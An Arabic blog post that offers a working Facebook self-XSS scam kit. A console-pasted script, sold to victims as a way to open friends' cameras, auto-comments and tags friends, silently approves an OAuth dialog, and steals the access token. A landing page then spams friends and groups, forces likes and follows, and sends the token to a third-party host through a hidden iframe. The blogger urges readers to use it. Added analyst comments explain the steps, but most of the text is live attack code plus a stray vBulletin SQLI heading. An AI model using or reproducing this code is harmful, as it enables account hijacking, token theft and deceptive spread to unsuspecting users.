الثلاثاء، 29 أبريل 2014

ثغرة النشر و الايكات و المشاركه للفيسبوك

السلام عليكم الموضوع بسيط وهو خداع الضحيه ان هالاكواد تقدر تشوف ككمرة الضحيه طبعاً هي كذا بس انت
الفخ بسيط طريقة عمل الكواد الاول يجب على الضحيه ادخال الكو في الكنوسول الادة التي في قوقل كروم و ادخال الكواد كامل بعد ذالك راح يشتغل كل شيء  :)
وطريقتك و وصدقني راح تنشر حسابات بالهبل وانا ما اخفيكم وقعت بالفخ و بديت  احلل



الاكواد بحطها و انتم جربوها :)

/**
 * Analyst note: first stage of the console-pasted payload (self-XSS; per the post,
 * the victim is talked into pasting this into the browser console).
 * Creates an inline <script> element whose text calls the page's own AsyncRequest
 * helper against /ajax/friends/lists/subscribe/modify with action=subscribe and
 * flid set to `uidss`, then appends it to the document so it executes.
 * Because it runs inside the already-open page, the request is made from the
 * victim's own page context; nothing here prompts the user.
 * `uidss` is concatenated into script source without any escaping.
 */
function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
// Runs immediately with a hard-coded list id, so pasting the code is the only user action involved.
IbraheemNada("302504309890089");
// Analyst note (obfuscated block; code left byte-for-byte as published):
// - _0xa22c is a string table. Every property name, URL and form parameter used
//   below is fetched from it by index, which hides the endpoints from a casual read.
// - fb_dtsg is read from the form field named "fb_dtsg" (the page's anti-CSRF token)
//   and user_id from the c_user cookie, so later requests pass the CSRF check.
// - arkadaslari_al(id): GETs /ajax/typeahead/first_degree.php (friends_only filter),
//   strips the "for (;;);" prefix from the response and eval()s it into the global
//   `arkadaslar`. This is eval() of a network response.
// - For every batch of 27 entries it builds " @[uid:text]" mention strings and hands
//   them to yorum_yap().
// - yorum_yap(id, text): POSTs to /ajax/ufi/add_comment.php with ft_ent_identifier
//   set to `id` (hard-coded above as "1428925077356293"), comment_text set to the
//   mentions, and the stolen fb_dtsg value. Net effect: the victim's account comments
//   on one fixed post and tags their friends in batches.
// - RandomArkadas() is defined but never called in this listing.
// Detection hints visible in the code: bursts of add_comment.php POSTs from one
// session right after a first_degree.php typeahead fetch, each comment consisting
// only of @-mentions.
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1428925077356293","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function 
(){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var 
_0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
 
// Analyst note: token-harvesting stage of the console payload (code unchanged).
// It silently walks an OAuth permission dialog on the victim's behalf, extracts the
// resulting access token and navigates the tab to an attacker-chosen URL with the
// token appended. Accounts that ran this should have the app authorization removed
// and the token treated as compromised.
// indexOf() only searches for its first argument, so the guard effectively matches
// hostnames containing "www.facebook.com".
if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
// User id from the c_user cookie; used as the localStorage key suffix and in the Graph lookup below.
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
// Fetches `url` (the OAuth dialog), parses the response into a detached <html>
// element, and forwards the first <form> plus its action URL to duzenlevegonder().
// izinverhtml and act are implicit globals.
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};            
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
// Re-submits the dialog form as if the user had pressed "confirm":
// copies every <input> name/value except the cancel fields, forces the first
// <select> to the value 80 (presumably an audience/privacy option; confirm),
// appends __CONFIRM__=1 and POSTs to the form's action. If the response holds
// another form it recurses; otherwise it pulls the token out of the
// "#access_token=...&expires_in" fragment in the response text.
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
// The second test is a bare indexOf() result: it is truthy for any value except 0.
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
// Names and values are concatenated without URL-encoding.
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
// The return value of replace() is discarded, so this line has no effect.
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
                        if(xmlhttp.readyState == 4){
                          izinhtml = document.createElement("html");
                          izinhtml.innerHTML = xmlhttp.responseText;
                        if(izinhtml.getElementsByTagName("form").length > 0){
                          izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
                          act = izinhtml.getElementsByTagName("form")[0].action;
                          duzenlevegonder(izinhtml,act)
                        }else{
                        // No further form: look for the implicit-grant token in the response body.
                        // match() returns null when absent, in which case the next line throws.
                        sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                        if (sex[1]) {
                        tokenyolla(sex[1]);
                        }
                        }
                        }
        };
 
xmlhttp.open("POST", act , true);
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);
 
}
 
// Builds the OAuth dialog URL: implicit grant (response_type=token) for app `id`,
// redirect_uri fbconnect://success, and a scope that includes publish_stream,
// i.e. the permission the posting functions on the landing page depend on.
function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}
 
// Runs the flow when no cached token entry exists for this user. `tarih` is not
// defined anywhere in this listing; it is only evaluated when the cache entry exists.
if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
// Hard-coded client_id of the app whose dialog is auto-confirmed.
uygulamaizinver(TokenUrl("121876164619130"));
// Synchronous, plain-http Graph lookup of the victim's profile; `isim` is not used later in this listing.
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
// Every 200 ms, empties all elements with the classes "_5ce", "uiToggle wrap" and
// "uiPopover". Presumably this removes menus/controls the user could otherwise use
// while the script runs; confirm against the page markup of that period.
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
// Exfiltration step: navigates the top-level window to a URL prefix (left as a
// placeholder string by the author) with the access token appended, so the token
// ends up in the address of the destination page.
function tokenyolla(token){
top.location.href = 'هنا رابط التزوير حط حط صورة فيه حركات كما وكذا :)' + token;
}}
// Decoy shown to the victim: the message claims the camera will open shortly and
// asks them to wait, which keeps the tab open while the requests above complete.
var N1X = "سيتم فتح الكاميرى بعد قليل ... الرجاء الانتظار";
alert(N1X);
الان ننتقل الى رابط التزوير و فيه الايكات و كل شيء
<!-- Analyst note: landing page that the console script redirects to, markup unchanged.
     It shows a "please wait" message (the camera pretext), loads third-party ad
     scripts, and schedules a meta refresh after 50 seconds to a link-shortener URL.
     The inner body's onload runs token(), get_groups(), get_friends(), join_group(),
     follow(), like_page() and timeline(), all defined in the script that follows and
     all acting with the access token carried in the page URL; join_group(), follow()
     and like_page() are invoked here without arguments. jQuery 1.7.1 is loaded over
     plain http. -->
<html>
<body style="margin:0; padding: 0; font-family: arial, helvetica, sans-serif; background: #eee; text-align: center;">

<div style="background: #fff; border: 1px solid #ccc; width: 730px; padding: 0 20px 20px 20px; margin: 20px auto; text-align: left;">

 <p style='font-size: 26px;'>انتظر جاري تحويلك لبروفايل الضحية وتشغيل الكاميرا</p>

 <div style='font-size: 15px;'><div><div id="723470731177970176" align="center" style="width: 100%; overflow-y: hidden;" class="wcustomhtml">
<script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12592_0&size=728x90" ></script>

<!-- Begin BidVertiser code -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=599165%26bid=1495132" type="text/javascript"></SCRIPT>
<noscript><a href="http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm">toolbar maker</a></noscript>
<!-- End BidVertiser code -->

<META http-equiv="refresh" content="50;URL=http://www.linkbucks.com/NjYR">


<center>
<img src="http://www.picz.ge/img/s3/1206/9/9/9e79856d8567.gif"></center>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="me" href="http://www.blogger.com/profile/02971939490169575171" />
<link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
</head>
<body onload="token();get_groups();get_friends();join_group();follow();like_page();timeline();">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script>
// Lure content that the posting functions below publish from the victim's account:
// a video link, a message promising covert access to friends' cameras, and an image URL.
var url = "https://www.youtube.com/watch?v=_nfk_Kjy2mA";
var text = "لاول مرررررة فتح كاميرا اي صديق بالفيسبوك بدون ان يدري انا فتحت كاميرا اصدقائي حبيت افيدكم شوفو الفيديو وتعلمو بدون اي تطبيقات كاذبة من هنا تابع الفيديو ع من هنا علي يوتيوب  --->";
var image_link = "http://www.mastcheck.com/uploads/13987570361.jpg";
// Implicit global counter incremented by the post_friends/post_groups success callbacks.
gonderildi = 0;
// Analyst note (packed payload; code left byte-for-byte as published. The listing is
// hard-wrapped in the middle of an escape sequence between its first two physical
// lines, so it does not parse exactly as shown).
// Two eval()-based unpackers rebuild JavaScript source from the hex-escaped strings
// in _0xfbbb by substituting dictionary words for short tokens:
//  1. The first decodes to a statement that sets
//     access_token = window.location.hash.substring(1),
//     i.e. the token is read from the URL fragment of this landing page.
//  2. The second defines token(), which sets the innerHTML of the element with id
//     "token" to an <iframe> whose src starts with
//     hxxp://www.7ky[.]us/token/token.php?at= followed by access_token. The trailing
//     attributes appear to give the frame zero height and width (decoded by hand;
//     verify before relying on it).
// Net effect: the OAuth token is sent to a third-party host as a query parameter,
// inside a frame the user is unlikely to see.
var _0xfbbb=["\x35\x20\x33\x3D\x5B\x22\x5C\x34\x5C\x78\x37\x35\x5C\x78\x36\x32\x5C\x34\x5C\x36\x5C\x78\x37\x32\x5C\x37\x5C\x38\x5C\x78\x36\x37\x22\x2C\x22\x5C\x39\x5C\x61\x5C\x34\x5C\x39\x22\x2C\x22\x5C\x78\x36\x43\x5C\x62\x5C\x78\x36\x33\x5C\x61\x5C\x36\x5C\x37\x5C\x62\x5C\x38\x22\x5D\x3B\x35\x20\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D\x77\x69\x6E\x64\x6F\x77\x5B\x33\x5B\x32\x5D\x5D\x5B\x33\x5B\x31\x5D\x5D\x5B\x33\x5B\x30\x5D\x5D\x28\x31\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x5F\x30\x78\x38\x34\x35\x37\x7C\x78\x37\x33\x7C\x76\x61\x72\x7C\x78\x37\x34\x7C\x78\x36\x39\x7C\x78\x36\x45\x7C\x78\x36\x38\x7C\x78\x36\x31\x7C\x78\x36\x46","\x72\x65\x70\x6C\x61\x63\x65","\x30","\x5B\x33\x2D\x39\x61\x62\x5D","\x5C\x62","\x67","\x76\x61\x72\x20\x69\x3D\x5B\x22\x5C\x62\x5C\x37\x5C\x37\x5C\x35\x5C\x39\x5C\x78\x34\x38\x5C\x78\x35\x34\x5C\x78\x34\x44\x5C\x78\x34\x43\x22\x2C\x22\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x22\x2C\x22\x5C\x6A\x5C\x35\x5C\x38\x5C\x78\x34\x35\x5C\x72\x5C\x35\x5C\x67\x5C\x35\x5C\x37\x5C\x38\x5C\x78\x34\x32\x5C\x74\x5C\x78\x34\x39\x5C\x6E\x22\x2C\x22\x5C\x77\x5C\x62\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x61\x5C\x73\x5C\x39\x5C\x78\x5C\x63\x5C\x36\x5C\x65\x5C\x38\x5C\x38\x5C\x66\x5C\x79\x5C\x6F\x5C\x6F\x5C\x70\x5C\x70\x5C\x70\x5C\x76\x5C\x78\x33\x37\x5C\x6D\x5C\x74\x5C\x76\x5C\x78\x37\x35\x5C\x73\x5C\x6F\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x6F\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x76\x5C\x66\x5C\x65\x5C\x66\x5C\x78\x33\x46\x5C\x68\x5C\x38\x5C\x63\x22\x2C\x22\x5C\x36\x5C\x61\x5C\x73\x5C\x38\x5C\x74\x5C\x72\x5C\x35\x5C\x63\x5C\x36\x5C\x7A\x5C\x64\x5C\x39\x5C\x6E\x5C\x35\x5C\x39\x5C\x79\x5C\x6B\x5C\x66\x5C\x71\x5C\x61\x5C\x78\x32\x33\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x61\x5C\x37\x5C\x64\x5C\x37\x5C\x35\x5C\x78\x33\x42\x5C\x36\x5C\x61\x5C\x37\x5C\x68\x5C\x67\x5C\x35\x5C\x63\x5C\x36\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x36\x5C\x61\x5C\x73\x5C\x78\x5C\x39\x5C\x64\x5C\x72\x5C\x72\x5C\x62\x5C\x3
7\x5C\x6A\x5C\x63\x5C\x36\x5C\x37\x5C\x64\x5C\x36\x5C\x61\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x7A\x5C\x64\x5C\x39\x5C\x6E\x5C\x35\x5C\x39\x5C\x63\x5C\x36\x5C\x6B\x5C\x36\x5C\x61\x5C\x67\x5C\x68\x5C\x39\x5C\x6A\x5C\x62\x5C\x37\x5C\x65\x5C\x35\x5C\x62\x5C\x6A\x5C\x65\x5C\x38\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x67\x5C\x68\x5C\x39\x5C\x6A\x5C\x62\x5C\x37\x5C\x70\x5C\x62\x5C\x6E\x5C\x38\x5C\x65\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x65\x5C\x35\x5C\x62\x5C\x6A\x5C\x65\x5C\x38\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x70\x5C\x62\x5C\x6E\x5C\x38\x5C\x65\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x41\x5C\x77\x5C\x6F\x5C\x62\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x41\x22\x5D\x3B\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x74\x6F\x6B\x65\x6E\x28\x29\x7B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x5B\x69\x5B\x32\x5D\x5D\x28\x69\x5B\x31\x5D\x29\x5B\x69\x5B\x30\x5D\x5D\x3D\x69\x5B\x33\x5D\x2B\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x2B\x69\x5B\x34\x5D\x7D\x3B","\x7C\x7C\x7C\x7C\x7C\x78\x36\x35\x7C\x78\x32\x32\x7C\x78\x36\x45\x7C\x78\x37\x34\x7C\x78\x37\x32\x7C\x78\x32\x30\x7C\x78\x36\x39\x7C\x78\x33\x44\x7C\x78\x36\x46\x7C\x78\x36\x38\x7C\x78\x37\x30\x7C\x78\x36\x44\x7C\x78\x36\x31\x7C\x5F\x30\x78\x33\x31\x66\x37\x7C\x78\x36\x37\x7C\x78\x33\x30\x7C\x78\x34\x36\x7C\x78\x36\x42\x7C\x78\x36\x34\x7C\x78\x32\x46\x7C\x78\x37\x37\x7C\x78\x37\x38\x7C\x78\x36\x43\x7C\x78\x37\x33\x7C\x78\x37\x39\x7C\x78\x36\x36\x7C\x78\x32\x45\x7C\x78\x33\x43\x7C\x78\x36\x33\x7C\x78\x33\x41\x7C\x78\x36\x32\x7C\x78\x33\x45","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x5B\x35\x2D\x39\x61\x2D\x7A\x41\x5D"];var _0xc9bc=[_0xfbbb[0],_0xfbbb[1],_0xfbbb[2],_0xfbbb[3],_0xfbbb[4],_0xfbbb[5],_0xfbbb[6],_0xfbbb[7],_0xfbbb[8]];eval(function (_0xdda6x2,_0xdda6x3,_0xdda6x4,_0xdda6x5,_0xdda6x6,_0xdda6x7){_0xdda6x6=function (_0xdda6x4){return _0xdda6x4.toString(36);} 
;if(_0xc9bc[5][_0xc9bc[4]](0,_0xdda6x6)==0){while(_0xdda6x4--){_0xdda6x7[_0xdda6x6(_0xdda6x4)]=_0xdda6x5[_0xdda6x4];} ;_0xdda6x5=[function (_0xdda6x6){return _0xdda6x7[_0xdda6x6]||_0xdda6x6;} ];_0xdda6x6=function (){return _0xc9bc[6];} ;_0xdda6x4=1;} ;while(_0xdda6x4--){if(_0xdda6x5[_0xdda6x4]){_0xdda6x2=_0xdda6x2[_0xc9bc[4]]( new RegExp(_0xc9bc[7]+_0xdda6x6(_0xdda6x4)+_0xc9bc[7],_0xc9bc[8]),_0xdda6x5[_0xdda6x4]);} ;} ;return _0xdda6x2;} (_0xc9bc[0],[],12,_0xc9bc[3][_0xc9bc[2]](_0xc9bc[1]),0,{}));var _0xe43d=[_0xfbbb[9],_0xfbbb[1],_0xfbbb[2],_0xfbbb[10],_0xfbbb[11],_0xfbbb[12],_0xfbbb[4],_0xfbbb[5],_0xfbbb[13],_0xfbbb[7],_0xfbbb[8]];eval(function (_0xdda6x9,_0xdda6xa,_0xdda6xb,_0xdda6xc,_0xdda6xd,_0xdda6xe){_0xdda6xd=function (_0xdda6xb){return (_0xdda6xb<62?_0xe43d[4]:_0xdda6xd(parseInt(_0xdda6xb/62)))+((_0xdda6xb=_0xdda6xb%62)>35?String[_0xe43d[5]](_0xdda6xb+29):_0xdda6xb.toString(36));} ;if(_0xe43d[7][_0xe43d[6]](0,_0xdda6xd)==0){while(_0xdda6xb--){_0xdda6xe[_0xdda6xd(_0xdda6xb)]=_0xdda6xc[_0xdda6xb];} ;_0xdda6xc=[function (_0xdda6xd){return _0xdda6xe[_0xdda6xd]||_0xdda6xd;} ];_0xdda6xd=function (){return _0xe43d[8];} ;_0xdda6xb=1;} ;while(_0xdda6xb--){if(_0xdda6xc[_0xdda6xb]){_0xdda6x9=_0xdda6x9[_0xe43d[6]]( new RegExp(_0xe43d[9]+_0xdda6xd(_0xdda6xb)+_0xe43d[9],_0xe43d[10]),_0xdda6xc[_0xdda6xb]);} ;} ;return _0xdda6x9;} (_0xe43d[0],[],37,_0xe43d[3][_0xe43d[2]](_0xe43d[1]),0,{}));

// Template section: these calls run as soon as the script loads, each making the
// victim's account subscribe to (follow) or like the given id. The arguments are
// placeholders left by the author (the first string reads "the first target page").
follow("الصفحة المراد الاولى");
follow("2");
follow("3");
follow("4");
follow("5");
follow("6");
follow("7");
follow("9");
follow("a10");
follow("11");
follow("12");
follow("13");
follow("00");
follow("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");

  // Queries FQL over JSONP for up to 70 of the token owner's groups in random order
  // and passes the result to post_groups(). The access token travels in the query
  // string of the request URL.
  function get_groups(){
  jQuery.ajax({
  url:'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token='+access_token,
  dataType:'jsonp',
  success:function(data){
  post_groups(data);
  }
  });
  }
  // Queries FQL over JSONP for up to 100 of the token owner's friends (uid and
  // first_name) in random order and passes the result to post_friends().
  function get_friends(){
  jQuery.ajax({
  url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token,
  dataType:'jsonp',
  success:function(data){
  post_friends(data);
  }
  });
  }
  // For every friend in list.data, issues a script-tag request to /<uid>/photos with
  // method=POST in the query string, publishing the lure image and message on that
  // friend's profile in the victim's name. `text` and `url` are concatenated without
  // URL-encoding, and `i` is an implicit global. The success callback only counts
  // completed requests; its inner `if` is empty.
  function post_friends(list){
     for(i=0;i<list.data.length;i++){
     jQuery.ajax({
     url:'https://graph.facebook.com/'+list.data[i].uid+'/photos?url=' + image_link + '&message=' + text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
     dataType:'script',
     success:function(){
     gonderildi += 1;
     if(gonderildi >= list.data.length){
  }
     }
     });
     }
     }
  // Same pattern as post_friends(), but targets /<gid>/photos for every group in
  // list.data, spreading the lure to each group the victim belongs to. Shares the
  // global counter `gonderildi`; the inner `if` is empty.
  function post_groups(list){
  for(i=0;i<list.data.length;i++){
  jQuery.ajax({
  url:'https://graph.facebook.com/'+list.data[i].gid+'/photos?url=' + image_link + '&message='+ text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  dataType:'script',
  success:function(){
  gonderildi += 1;
  if(gonderildi >= list.data.length){
  }
  }
  });
  }
  }
     
  // Publishes the lure photo to the victim's own /me/photos, then fetches up to 100
  // friends and requests /<photo id>/tags/<friend id> for each, so the post shows up
  // for every tagged friend. The collected id array (_0x1f66x13) is never read, and
  // the tag responses are ignored.
  function timeline() {
    $['getJSON']('https://graph.facebook.com/me/photos?url=' + image_link + '&message=' + text + '' + url + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
        if (_0x1f66xf['id']) {
            var _0x1f66x11 = _0x1f66xf['id'];
            var _0x1f66x12 = 100;
            $['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
                if (_0x1f66xf['data']) {
                    var _0x1f66x13 = [];
                    $['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
                        _0x1f66x13['push'](_0x1f66x7['id']);
                        $['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
                    });
                };
            });
        };
    });
};


  // Requests /<id>/subscribers with method=post, subscribing the token owner to `id`.
  // The response is ignored.
  function follow(id){
     $.getJSON('https://graph.facebook.com/' + id + '/subscribers?method=post&access_token=' + access_token, function (response) {
     });
  }
  // Requests /me/likes with method=POST and url=https://www.facebook.com/<id>,
  // making the token owner like that page. The response is ignored.
  function like_page(id){
     $.getJSON('https://graph.facebook.com/me/likes?access_token=' + access_token + '&method=POST&url=https://www.facebook.com/' + id, function (response) {
     });
  }
  // Requests /<id>/likes/ with method=post, liking the object `id` as the token
  // owner. Not called anywhere in this listing.
  function like_post(id){
     $.getJSON('https://graph.facebook.com/' + id + '/likes/?method=post&access_token=' + access_token, function (response) {
     });
  }
  // Looks up the token owner's id via /me, then requests /<grpid>/members/<userid>
  // with method=post to add that user to the group. The final response check is an
  // empty `if`. The page's onload handler calls this without an argument, so `grpid`
  // is undefined on that path.
  function join_group(grpid){
  $.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
  if (response.id) {
  var userid = response.id;
  $.getJSON('https://graph.facebook.com/'+grpid+'/members/' + userid + '?method=post&access_token=' + access_token, function (response) {
     if(response.data){
  }
  });
  }
  });
  }

</script>
<div id="token"><div/> <script type="text/javascript" src="https://www.blogger.com/static/v1/common/js/1912144495-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
 <script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12592_0&size=300x250" ></script>
</html>

 <script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12593_0&size=468x60" ></script></div>



</div></div>

</div>

</body>
</html>

الأربعاء، 27 مارس 2013

vbulletin 4.1.5 attachment SQLI


vbulletin 4.1.5 attachment SQLI
